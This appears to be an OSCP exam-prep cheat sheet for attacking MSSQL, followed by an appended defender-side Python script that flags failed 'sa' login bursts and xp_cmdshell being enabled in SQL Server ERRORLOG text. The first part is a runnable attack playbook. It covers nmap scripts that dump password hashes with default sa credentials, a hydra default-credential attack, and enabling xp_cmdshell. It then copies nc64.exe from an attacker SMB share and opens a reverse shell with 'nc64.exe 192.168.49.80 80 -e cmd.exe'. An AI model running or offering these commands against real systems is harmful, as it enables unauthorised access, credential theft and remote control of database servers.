MSSQL OSCP

Post category: OSCP

MSSQL Services

mssql-vulnerability – Nmap can be leveraged to scan MSSQL for known vulnerabilities.

Example syntax:

nmap -vv -sV -Pn -p [PORT] --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes --script-args=mssql.instance-port=[PORT],mssql.username=sa,mssql.password=sa [IP]

mssql-default – Hydra can be utilized to check the MSSQL database for default credentials.

Example syntax:

hydra -s [PORT] -C ./wordlists/mssql-default-userpass.txt -u -f [IP] mssql

Using MSSQL xp_cmdshell to get reverse shell

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

SQL> xp_cmdshell "whoami"
output
--------------------------------------------------------------------------------
nt service\mssql$sqlexpress
NULL

Start an SMB share (impacket's smbserver.py, share name "tools" backed by the current directory):

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py tools .

SQL> xp_cmdshell "copy \\192.168.49.80\tools\nc64.exe c:\temp"

SQL> xp_cmdshell "c:\temp\nc64.exe 192.168.49.80 80 -e cmd.exe"
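Added example from the defender's side (not part of the original notes): a Python scan over constructed SQL Server ERRORLOG-style lines for the two traces this procedure leaves on the server, a burst of failed 'sa' logins from one client (the hydra default-credential check) and xp_cmdshell being switched on with sp_configure. The message texts follow the ERRORLOG layout as I know it; the timestamps, client address and spid are invented.

```python
"""Flag two footprints of the procedure above in SQL Server's ERRORLOG: a burst of failed 'sa'
logins from one client, and xp_cmdshell being switched on through sp_configure."""
import re
from datetime import datetime

# Constructed sample lines in the ERRORLOG layout; hosts, spid and times are invented.
SAMPLE_LOG = """\
2024-05-01 10:14:01.12 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.49.80]
2024-05-01 10:14:01.40 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.49.80]
2024-05-01 10:14:01.88 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.49.80]
2024-05-01 10:14:02.05 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.49.80]
2024-05-01 10:14:02.31 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.49.80]
2024-05-01 10:15:22.43 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-05-01 10:15:23.01 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-05-01 10:20:00.00 Logon       Login failed for user 'app_user'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.7]
"""

TIMESTAMP = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})")
FAILED_LOGIN = re.compile(r"Login failed for user '(?P<user>[^']+)'.*\[CLIENT: (?P<client>[^\]]+)\]")
CONFIG_CHANGE = re.compile(r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)")

def _when(line):
    return datetime.strptime(TIMESTAMP.match(line).group(1), "%Y-%m-%d %H:%M:%S.%f")

def find_xp_cmdshell_enabled(log):
    """Timestamps (as strings) at which 'xp_cmdshell' was changed from 0 to 1."""
    hits = []
    for line in log.splitlines():
        m = CONFIG_CHANGE.search(line)
        if m and m["option"] == "xp_cmdshell" and (m["old"], m["new"]) == ("0", "1"):
            hits.append(TIMESTAMP.match(line).group(1))
    return hits

def find_login_bursts(log, threshold=5, window_seconds=60):
    """(user, client) -> total failures, for pairs with >= threshold failed logins inside window_seconds."""
    attempts = {}
    for line in log.splitlines():
        m = FAILED_LOGIN.search(line)
        if m:
            attempts.setdefault((m["user"], m["client"]), []).append(_when(line))
    bursts = {}
    for key, times in attempts.items():
        times.sort()
        # Any run of `threshold` consecutive failures that fits inside the window counts as a burst.
        for i in range(len(times) - threshold + 1):
            if (times[i + threshold - 1] - times[i]).total_seconds() <= window_seconds:
                bursts[key] = len(times)
                break
    return bursts
```

Feed the text of a real ERRORLOG (on most installs it is UTF-16 encoded) to the two functions instead of SAMPLE_LOG; the single 'app_user' failure shows that isolated failures are not reported.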